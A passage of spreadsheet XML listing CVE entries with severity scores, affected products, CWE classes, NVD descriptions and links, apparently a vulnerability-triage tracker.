      </c>
      <c r="H68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83" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J683" s="5" t="inlineStr"/>
      <c r="K683" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L683" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows DHCP Server allows an authorized attacker to execute code over an adjacent network.</t>
        </is>
      </c>
      <c r="M683" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69847</t>
        </is>
      </c>
    </row>
    <row r="684">
      <c r="A684" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B684" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69875</t>
        </is>
      </c>
      <c r="C684" s="5" t="n">
        <v>8</v>
      </c>
      <c r="D684" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E684" s="5" t="inlineStr"/>
      <c r="F684" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="G684" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H684" s="5" t="inlineStr"/>
      <c r="I684" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J684" s="5" t="inlineStr"/>
      <c r="K684" s="5" t="inlineStr">
        <is>
          <t>CWE-122, CWE-125</t>
        </is>
      </c>
      <c r="L684" s="5" t="inlineStr">
        <is>
          <t>Heap-based</t>
        </is>
      </c>
      <c r="M684" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69875</t>
        </is>
      </c>
    </row>
    <row r="685">
      <c r="A685" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B685" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69876</t>
        </is>
      </c>
      <c r="C685" s="5" t="n">
        <v>8</v>
      </c>
      <c r="D685" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E685" s="5" t="inlineStr"/>
      <c r="F685" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="G685" s="5" t="inlineStr">
        <is>
          <t>microsoft, windows</t>
        </is>
      </c>
      <c r="H685" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="I685" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J685" s="5" t="inlineStr"/>
      <c r="K685" s="5" t="inlineStr">
        <is>
          <t>CWE-415, CWE-416</t>
        </is>
      </c>
      <c r="L685" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows DHCP Server allows an authorized attacker to execute code over an adjacent network.</t>
        </is>
      </c>
      <c r="M685" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69876</t>
        </is>
      </c>
    </row>
    <row r="686">
      <c r="A686" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B686" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-79755</t>
        </is>
      </c>
      <c r="C686" s="5" t="n">
        <v>8</v>
      </c>
      <c r="D686" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E686" s="5" t="inlineStr"/>
      <c r="F686" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G686" s="5" t="inlineStr">
        <is>
          <t>docker</t>
        </is>
      </c>
      <c r="H686" s="5" t="inlineStr"/>
      <c r="I686" s="5" t="inlineStr">
        <is>
          <t>2026-09-02</t>
        </is>
      </c>
      <c r="J686" s="5" t="inlineStr"/>
      <c r="K686" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="L686" s="5" t="inlineStr">
        <is>
          <t>Nuclio is a "Serverless" framework for Real-Time Events and Data Processing. Prior to version 1.17.4, on the Nuclio local Docker platform, the function namespace is interpolated—unvalidated—into a double-quoted docker ps --filter "label=nuclio.io/namespace=&lt;value&gt;" command that is executed via the host shell (/bin/sh -c). Because the default auth kind is nop (unauthenticated), a remote attacker can inject arbitrary OS commands that run as root inside the dashboard container, which holds the Docker socket → host compromise. This issue has been patched in version 1.17.4.</t>
        </is>
      </c>
      <c r="M686" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-79755</t>
        </is>
      </c>
    </row>
    <row r="687">
      <c r="A687" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B687" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-83948</t>
        </is>
      </c>
      <c r="C687" s="5" t="n">
        <v>8</v>
      </c>
      <c r="D687" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E687" s="5" t="inlineStr"/>
      <c r="F687" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G687" s="5" t="inlineStr">
        <is>
          <t>microsoft, azure</t>
        </is>
      </c>
      <c r="H687" s="5" t="inlineStr"/>
      <c r="I687" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J687" s="5" t="inlineStr"/>
      <c r="K687" s="5" t="inlineStr">
        <is>
          <t>CWE-77</t>
        </is>
      </c>
      <c r="L687" s="5" t="inlineStr">
        <is>
          <t>Improper neutralization of special elements used in a command ('command injection') in Microsoft Azure CLI allows an authorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="M687" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-83948</t>
        </is>
      </c>
    </row>
    <row r="688">
      <c r="A688" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B688" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84935</t>
        </is>
      </c>
      <c r="C688" s="5" t="n">
        <v>8</v>
      </c>
      <c r="D688" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E688" s="5" t="inlineStr"/>
      <c r="F688" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G688" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H688" s="5" t="inlineStr"/>
      <c r="I688" s="5" t="inlineStr">
        <is>
          <t>2026-09-05</t>
        </is>
      </c>
      <c r="J688" s="5" t="inlineStr"/>
      <c r="K688" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L688" s="5" t="inlineStr">
        <is>
          <t>The HT Menu  WordPress plugin before 1.2.7 does not perform any capability or object-ownership check when saving navigation menu-item settings, and does not escape those stored settings when the menu is rendered, allowing users with minimal permissions such as Subscribers to store JavaScript that executes in the browser of any visitor, administrators included, who views the affected menu.</t>
        </is>
      </c>
      <c r="M688" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84935</t>
        </is>
      </c>
    </row>
    <row r="689">
      <c r="A689" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B689" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-43133</t>
        </is>
      </c>
      <c r="C689" s="5" t="n">
        <v>7.9</v>
      </c>
      <c r="D689" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E689" s="5" t="inlineStr"/>
      <c r="F689" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G689" s="5" t="inlineStr">
        <is>
          <t>linux kernel</t>
        </is>
      </c>
      <c r="H689" s="5" t="inlineStr">
        <is>
          <t>linux:linux_kernel</t>
        </is>
      </c>
      <c r="I689" s="5" t="inlineStr">
        <is>
          <t>2026-05-06</t>
        </is>
      </c>
      <c r="J689" s="5" t="inlineStr"/>
      <c r="K689" s="5" t="inlineStr">
        <is>
          <t>CWE-628</t>
        </is>
      </c>
      <c r="L689" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
KVM: nSVM: Always use vmcb01 in VMLOAD/VMSAVE emulation
Commit cc3ed80ae69f ("KVM: nSVM: always use vmcb01 to for vmsave/vmload
of guest state") made KVM always use vmcb01 for the fields controlled by
VMSAVE/VMLOAD, but it missed updating the VMLOAD/VMSAVE emulation code
to always use vmcb01.
As a result, if VMSAVE/VMLOAD is executed by an L2 guest and is not
intercepted by L1, KVM will mistakenly use vmcb02. Always use vmcb01
instead of the current VMCB.</t>
        </is>
      </c>
      <c r="M689" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-43133</t>
        </is>
      </c>
    </row>
    <row r="690">
      <c r="A690" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B690" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-44629</t>
        </is>
      </c>
      <c r="C690" s="5" t="n">
        <v>7.9</v>
      </c>
      <c r="D690" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E690" s="5" t="inlineStr"/>
      <c r="F690" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G690" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H690" s="5" t="inlineStr"/>
      <c r="I690" s="5" t="inlineStr">
        <is>
          <t>2026-08-28</t>
        </is>
      </c>
      <c r="J690" s="5" t="inlineStr"/>
      <c r="K690" s="5" t="inlineStr">
        <is>
          <t>CWE-922</t>
        </is>
      </c>
      <c r="L690" s="5" t="inlineStr">
        <is>
          <t>Improper access control to the Synergis Softwire installation folder. This vulnerability affects Streamvault all-in-one appliances (SV-100E and SV-300E series) and Synergis Softwire installed on Windows servers.</t>
        </is>
      </c>
      <c r="M690" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-44629</t>
        </is>
      </c>
    </row>
    <row r="691">
      <c r="A691" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B691" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-0065</t>
        </is>
      </c>
      <c r="C691" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D691" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E691" s="5" t="inlineStr"/>
      <c r="F691" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G691" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H691" s="5" t="inlineStr"/>
      <c r="I691" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J691" s="5" t="inlineStr"/>
      <c r="K691" s="5" t="inlineStr">
        <is>
          <t>CWE-693</t>
        </is>
      </c>
      <c r="L691" s="5" t="inlineStr">
        <is>
          <t>In areBackgroundActivityStartsAllowed of BackgroundLaunchProcessController.java, there is a possible unintended way to launch activities in the background due to a logic error in the code. This could lead to local escalation of privilege with User execution privileges needed. User interaction is not needed for exploitation.</t>
        </is>
      </c>
      <c r="M691" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-0065</t>
        </is>
      </c>
    </row>
    <row r="692">
      <c r="A692" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B692" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-0084</t>
        </is>
      </c>
      <c r="C692" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D692" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E692" s="5" t="inlineStr"/>
      <c r="F692" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G692" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H692" s="5" t="inlineStr"/>
      <c r="I692" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J692" s="5" t="inlineStr"/>
      <c r="K692" s="5" t="inlineStr">
        <is>
          <t>CWE-693</t>
        </is>
      </c>
      <c r="L692" s="5" t="inlineStr">
        <is>
          <t>In multiple functions of HostEmulationManager.java, there is a possible background activity launch due to a logic error in the code. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.</t>
        </is>
      </c>
      <c r="M692" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-0084</t>
        </is>
      </c>
    </row>
    <row r="693">
      <c r="A693" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B693" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-12410</t>
        </is>
      </c>
      <c r="C693" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D693" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E693" s="5" t="inlineStr"/>
      <c r="F693" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G693" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H693" s="5" t="inlineStr"/>
      <c r="I693" s="5" t="inlineStr">
        <is>
          <t>2026-08-05</t>
        </is>
      </c>
      <c r="J693" s="5" t="inlineStr"/>
      <c r="K693" s="5" t="inlineStr">
        <is>
          <t>CWE-59</t>
        </is>
      </c>
      <c r="L693" s="5" t="inlineStr">
        <is>
          <t>Link following vulnerability in the Uninstaller component in CCleaner prior to 7.10.1464 on Windows allows a local, low-privileged attacker to escalate privileges to SYSTEM via a symlink/junction created during application uninstallation, which CCleaner follows when deleting the application's data folder with elevated integrity.</t>
        </is>
      </c>
      <c r="M693" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-12410</t>
        </is>
      </c>
    </row>
    <row r="694">
      <c r="A694" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B694" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-16826</t>
        </is>
      </c>
      <c r="C694" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D694" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E694" s="5" t="inlineStr"/>
      <c r="F694" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G694" s="5" t="inlineStr">
        <is>
          <t>ibm</t>
        </is>
      </c>
      <c r="H694" s="5" t="inlineStr">
        <is>
          <t>ibm:i</t>
        </is>
      </c>
      <c r="I694" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J694" s="5" t="inlineStr"/>
      <c r="K694" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="L694" s="5" t="inlineStr">
        <is>
          <t>IBM i 7.6, 7.5, 7.4, and 7.3 could allow a local attacker to execute arbitrary commands due to improper neutralization of special elements used in an OS command.</t>
        </is>
      </c>
      <c r="M694" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-16826</t>
        </is>
      </c>
    </row>
    <row r="695">
      <c r="A695" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B695" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-17499</t>
        </is>
      </c>
      <c r="C695" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D695" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E695" s="5" t="inlineStr"/>
      <c r="F695" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G695" s="5" t="inlineStr">
        <is>
          <t>ibm</t>
        </is>
      </c>
      <c r="H695" s="5" t="inlineStr">
        <is>
          <t>ibm:i</t>
        </is>
      </c>
      <c r="I695" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J695" s="5" t="inlineStr"/>
      <c r="K695" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="L695" s="5" t="inlineStr">
        <is>
          <t>IBM i 7.6, 7.5, 7.4, and 7.3 could allow a local attacker to execute arbitrary commands due to improper neutralization of special elements used in an OS command.</t>
        </is>
      </c>
      <c r="M695" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-17499</t>
        </is>
      </c>
    </row>
    <row r="696">
      <c r="A696" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B696" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-17523</t>
        </is>
      </c>
      <c r="C696" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D696" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E696" s="5" t="inlineStr"/>
      <c r="F696" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G696" s="5" t="inlineStr">
        <is>
          <t>linux kernel</t>
        </is>
      </c>
      <c r="H696" s="5" t="inlineStr"/>
      <c r="I696" s="5" t="inlineStr">
        <is>
          <t>2026-07-27</t>
        </is>
      </c>
      <c r="J696" s="5" t="inlineStr"/>
      <c r="K696" s="5" t="inlineStr"/>
      <c r="L696" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
can: bcm: switch timer to HRTIMER_MODE_SOFT and remove hrtimer_tasklet
This patch switches the timer to HRTIMER_MODE_SOFT, which executed the
timer callback in softirq context and removes the hrtimer_tasklet.</t>
        </is>
      </c>
      <c r="M696" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-17523</t>
        </is>
      </c>
    </row>
    <row r="697">
      <c r="A697" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B697" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-19820</t>
        </is>
      </c>
      <c r="C697" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D697" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E697" s="5" t="inlineStr"/>
      <c r="F697" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G697" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H697" s="5" t="inlineStr"/>
      <c r="I697" s="5" t="inlineStr">
        <is>
          <t>2026-09-01</t>
        </is>
      </c>
      <c r="J697" s="5" t="inlineStr"/>
      <c r="K697" s="5" t="inlineStr">
        <is>
          <t>CWE-59</t>
        </is>
      </c>
      <c r="L697" s="5" t="inlineStr">
        <is>
          <t>A vulnerability in the Backblaze Client allows a local user to make the system not bootable by creating a link from Backblaze's folder to Windows OS system files during a backup. Successful exploitation requires an administrator-level system change that results in the absence of specific Windows OS security controls. This vulnerability is due to improper link resolution.</t>
        </is>
      </c>
      <c r="M697" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-19820</t>
        </is>
      </c>
    </row>
    <row r="698">
      <c r="A698" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B698" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-2310</t>
        </is>
      </c>
      <c r="C698" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D698" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E698" s="5" t="inlineStr"/>
      <c r="F698" s="5" t="inlineStr"/>
      <c r="G698" s="5" t="inlineStr">
        <is>
          <t>ibm</t>
        </is>
      </c>
      <c r="H698" s="5" t="inlineStr"/>
      <c r="I698" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J698" s="5" t="inlineStr"/>
      <c r="K698" s="5" t="inlineStr">
        <is>
          <t>CWE-91</t>
        </is>
      </c>
      <c r="L698" s="5" t="inlineStr">
        <is>
          <t>IBM webMethods Integration Server 11.1 IBM webMethods Integration is vulnerable to an XML external entity injection (XXE) attack when processing XML data. A remote attacker could exploit this vulnerability to expose sensitive information or consume memory resources.</t>
        </is>
      </c>
      <c r="M698" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-2310</t>
        </is>
      </c>
    </row>
    <row r="699">
      <c r="A699" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B699" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-28593</t>
        </is>
      </c>
      <c r="C699" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D699" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E699" s="5" t="inlineStr"/>
      <c r="F699" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G699" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H699" s="5" t="inlineStr"/>
      <c r="I699" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J699" s="5" t="inlineStr"/>
      <c r="K699" s="5" t="inlineStr">
        <is>
          <t>CWE-356</t>
        </is>
      </c>
      <c r="L699" s="5" t="inlineStr">
        <is>
          <t>In getItemList of SettingsFragment.java, there is a possible user interaction bypass due to misleading or insufficient UI. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.</t>
        </is>
      </c>
      <c r="M699" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-28593</t>
        </is>
      </c>
    </row>
    <row r="700">
      <c r="A700" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B700" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-28599</t>
        </is>
      </c>
      <c r="C700" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D700" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E700" s="5" t="inlineStr"/>
      <c r="F700" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G700" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H700" s="5" t="inlineStr"/>
      <c r="I700" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J700" s="5" t="inlineStr"/>
      <c r="K700" s="5" t="inlineStr">
        <is>
          <t>CWE-693</t>
        </is>
      </c>
      <c r="L700" s="5" t="inlineStr">
        <is>
          <t>In addCreatorToken of ActivityManagerService.java, there is a possible Intent Redirection Bypass due to a logic error in the code. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.</t>
        </is>
      </c>
      <c r="M700" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-28599</t>
        </is>
      </c>
    </row>
    <row r="701">
      <c r="A701" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B701" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-28600</t>
        </is>
      </c>
      <c r="C701" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D701" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E701" s="5" t="inlineStr"/>
      <c r="F701" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G701" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H701" s="5" t="inlineStr"/>
      <c r="I701" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J701" s="5" t="inlineStr"/>
      <c r="K701" s="5" t="inlineStr">
        <is>
          <t>CWE-441</t>
        </is>
      </c>
      <c r="L701" s="5" t="inlineStr">
        <is>
          <t>In onCreate of PaymentDefaultDialog.java, there is a possible way to change default payment app due to a confused deputy. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.</t>
        </is>
      </c>
      <c r="M701" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-28600</t>
        </is>
      </c>
    </row>
    <row r="702">
      <c r="A702" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B702" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-28602</t>
        </is>
      </c>
      <c r="C702" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D702" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E702" s="5" t="inlineStr"/>
      <c r="F702" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G702" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H702" s="5" t="inlineStr"/>
      <c r="I702" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J702" s="5" t="inlineStr"/>
      <c r="K702" s="5" t="inlineStr">
        <is>
          <t>CWE-284</t>
        </is>
      </c>
      <c r="L702" s="5" t="inlineStr">
        <is>
          <t>In setClipboardAccessNotificationsEnabledForUser of ClipboardService.java, there is a possible mult-iuser isolation due to a logic error in the code. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.</t>
        </is>
      </c>
      <c r="M702" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-28602</t>
        </is>
      </c>
    </row>
    <row r="703">
      <c r="A703" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B703" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-28603</t>
        </is>
      </c>
      <c r="C703" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D703" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E703" s="5" t="inlineStr"/>
      <c r="F703" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G703" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H703" s="5" t="inlineStr"/>
      <c r="I703" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J703" s="5" t="inlineStr"/>
      <c r="K703" s="5" t="inlineStr">
        <is>
          <t>CWE-441</t>
        </is>
      </c>
      <c r="L703" s="5" t="inlineStr">
        <is>
          <t>In assertSafeToStartCustomActivity of AppRestrictionsFragment.java, there is a possible read/write access to private files due to a confused deputy. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.</t>
        </is>
      </c>
      <c r="M703" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-28603</t>
        </is>
      </c>
    </row>
    <row r="704">
      <c r="A704" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B704" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-28611</t>
        </is>
      </c>
      <c r="C704" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D704" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E704" s="5" t="inlineStr"/>
      <c r="F704" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G704" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H704" s="5" t="inlineStr"/>
      <c r="I704" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J704" s="5" t="inlineStr"/>
      <c r="K704" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="L704" s="5" t="inlineStr">
        <is>
          <t>In multiple functions of NfcService.java, there is a possible silent payment session hijacking enablement due to a missing permission check. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.</t>
        </is>
      </c>
      <c r="M704" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-28611</t>
        </is>
      </c>
    </row>
    <row r="705">
      <c r="A705" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B705" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-28612</t>
        </is>
      </c>
      <c r="C705" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D705" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E705" s="5" t="inlineStr"/>
      <c r="F705" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G705" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H705" s="5" t="inlineStr"/>
      <c r="I705" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J705" s="5" t="inlineStr"/>
      <c r="K705" s="5" t="inlineStr">
        <is>
          <t>CWE-693</t>
        </is>
      </c>
      <c r="L705" s="5" t="inlineStr">
        <is>
          <t>In resolveActivity of ActivityStarter.java, there is a possible way to perform Intent Redirection attacks due to a logic error in the code. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.</t>
        </is>
      </c>
      <c r="M705" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-28612</t>
        </is>
      </c>
    </row>
    <row r="706">
      <c r="A706" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B706" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-28614</t>
        </is>
      </c>
      <c r="C706" s="5" t="n">
        <v>7.8</v>
